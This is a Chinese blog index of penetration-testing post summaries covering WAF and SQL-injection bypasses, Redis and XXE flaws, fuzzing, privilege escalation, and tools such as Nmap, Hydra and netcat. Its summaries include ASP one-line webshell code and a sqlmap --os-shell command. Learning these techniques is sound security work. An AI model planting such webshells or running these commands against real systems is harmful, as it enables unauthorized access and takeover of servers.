随笔分类 - 渗透测试
摘要:shodan使用教程 Shodan简介 Shodan是互联网上最可怕的搜索引擎,与谷歌不同的是,Shodan不是在网上搜索网址,而是直接进入互联网的背后通道。Shodan可以说是一款“黑暗”谷歌,一刻不停的寻找所有和互联网关联的服务器,摄像头,打印机,路由器。 网站地址https://www.sho
阅读全文
摘要:利用http协议绕过waf 分块传输绕过waf 先在数据包中添加Transfer-Encoding: chunked 数字代表下一列字符所占位数,最后需要用0独占一行表示结束,结尾需要两个回车 在头部加入 Transfer-Encoding: chunked 之后,就代表这个报文采用了分块编码。这时
阅读全文
摘要:SQL注入WAF绕过 (1)大小写绕过 此类绕过不经常使用,但是用的时候也不能忘了它,他原理是基于SQL语句不分大小写的,但过滤只过滤其中一种。 (2)替换关键字 这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过 http://www
阅读全文
摘要:缓冲区溢出的保护机制 缓冲区溢出原理 缓冲区是内存中存放数据的地方。在程序试图将数据放到机器内存中的某一个位置的时候,因为没有足够的空间就会发生缓冲区溢出。而人为的溢出则是有一定企图的,攻击者写一个超过缓冲区长度的字符串,植入到缓冲区,然后再向一个有限空间的缓冲区中植入超长的字符串,这时可能会出现两
阅读全文
摘要:Redis未授权漏洞 引言 在Web应用发展的初期,那时关系型数据库受到了较为广泛的关注和应用,原因是因为那时候Web站点基本上访问和并发不高、交互也较少。而在后来,随着访问量的提升,使用关系型数据库的Web站点多多少少都开始在性能上出现了一些瓶颈,而瓶颈的源头一般是在磁盘的I/O上。而随着互联网技
阅读全文
摘要:AFL 漏洞挖掘技术漫谈(一):用 AFL 开始你的第一次 Fuzzing 转载自天融信阿尔法实验室 一、前言 模糊测试(Fuzzing)技术作为漏洞挖掘最有效的手段之一,近年来一直是众多安全研究人员发现漏洞的首选技术。AFL、LibFuzzer、honggfuzz等操作简单友好的工具相继出现,也极
阅读全文
摘要:文件包含说明 定义:在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。 程序开发人
阅读全文
摘要:搭建靶场环境 快速搭建环境,我认为用docker是一个比较好的选择,快速、简单、占用资源较少 DVWA 搜索镜像 docker search dvwa 选一个合适的就可以使用,eg:nfoslack/dvwa 拉取infoslack/dvwa 拉取镜像 docker pull infoslack/d
阅读全文
摘要:Ubuntu快速安装MSF的命令 这个官方安装脚本,我们只需要运行一下就行了 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-w
阅读全文
摘要:XXE漏洞 基础知识: 1、xml: XML 指可扩展标记语言 XML 被设计用来传输和存储数据 HTML 被设计用来显示数据 XML与HTML的主要差异: XML不是HTML的替代。 XML和HTML为不同的目的而设计: XML被设计为传输和存储数据,其焦点是数据的内容。 HTML被设计用来显示数
阅读全文
摘要:HTTP取消同步攻击:请求走私重生 前言 传统上,HTTP请求被视为独立的独立实体。在本文中,我将探索被遗忘的技术,这些技术可以使远程未经身份验证的攻击者粉碎这种隔离并将他们的请求分解为其他内容,从而使我能够利用众多商业和军事系统的网络基础设施来扮演伪装者,访客,并获得超过$ 70k的错误赏金。 我
阅读全文
摘要:pentestbox使用教程 1、下载 pentestbox 目前已经更新到了V2.3,官方下载地址在https://pentestbox.org/blog/ 目前有两个版本,一个版本带有Metasploit,一个版本不带有Metasploit 2、安装 pentestbox安装非常简单,一直点击下
阅读全文
摘要:我们在做渗透测试的时候会经常遇到存在命令执行的Windows服务器,而且不能上传shell,唯一的入口就是命令执行,这种情况下,我们需要向服务器上传一个大一点的工具,如何实现,这就是本文章主要的内容。 利用http协议下载文件 利用vbs下载 将下面的代码保存为test.vbs 执行如下语句: cs
阅读全文
摘要:windows提权 1.通过sqlmap连接mysql获取shell (1)直接连接数据库 sqlmap.py -d “mysql://root:123456@127.0.0.1:3306/mysql”–os-shell (2)通过选择32位或者64位操作系统,获取webshell,执行 bash
阅读全文
摘要:注入总结 参考链接 MYSQL 有时使用union注入时,会出现一些乱码,如下解决 convert(@@version using latin1) unhex(hex(@@version)) 注释符 井号(#) 双横线 (-- )后面要加一个空格 /**/ 局部注释 %00 直接截断字符串 `反引号
阅读全文
摘要:一句话木马 asp <%execute(request("kxc"))%> <%eval request ("pass")%> <%eval request(chr(35))%> <%executerequest("YouPass")%> <%eval(request(“1″)):response.
阅读全文
摘要:信息收集 1.IP信息 17CE 看是否存在cdn 存在的话,查找真实ip 从国外去访问,查看ip信息 去掉www,然后查看ip信息 2.旁站信息 webscan.cc 站长之家 3.C段信息 webscan.cc 站长之家 4.子域名信息 layer子域名挖掘机 subdomain 5.端口信息
阅读全文
摘要:渗透测试工具篇——NetCat 简介 Netcat 常称为 nc,拥有“瑞士军刀”的美誉。nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非
阅读全文
摘要:渗透测试工具篇——Hydra 简介 Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具,主要目的是:展示安全研究人员从远程获取一个系统认证权限。 目前该工具支持以下协议的爆破: AFP,Cisco AAA,Cisco身份验证,
阅读全文
摘要:渗透测试工具篇——Nmap 介绍 Nmap是一款网络扫描和主机检测的非常有用的工具。 Nmap是不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器。它可以适用于winodws,linux,mac等操作系统。Nmap是一款非常强大的实用工具,包含四项基本功能: 主机发现(Host
阅读全文
浙公网安备 33010602011771号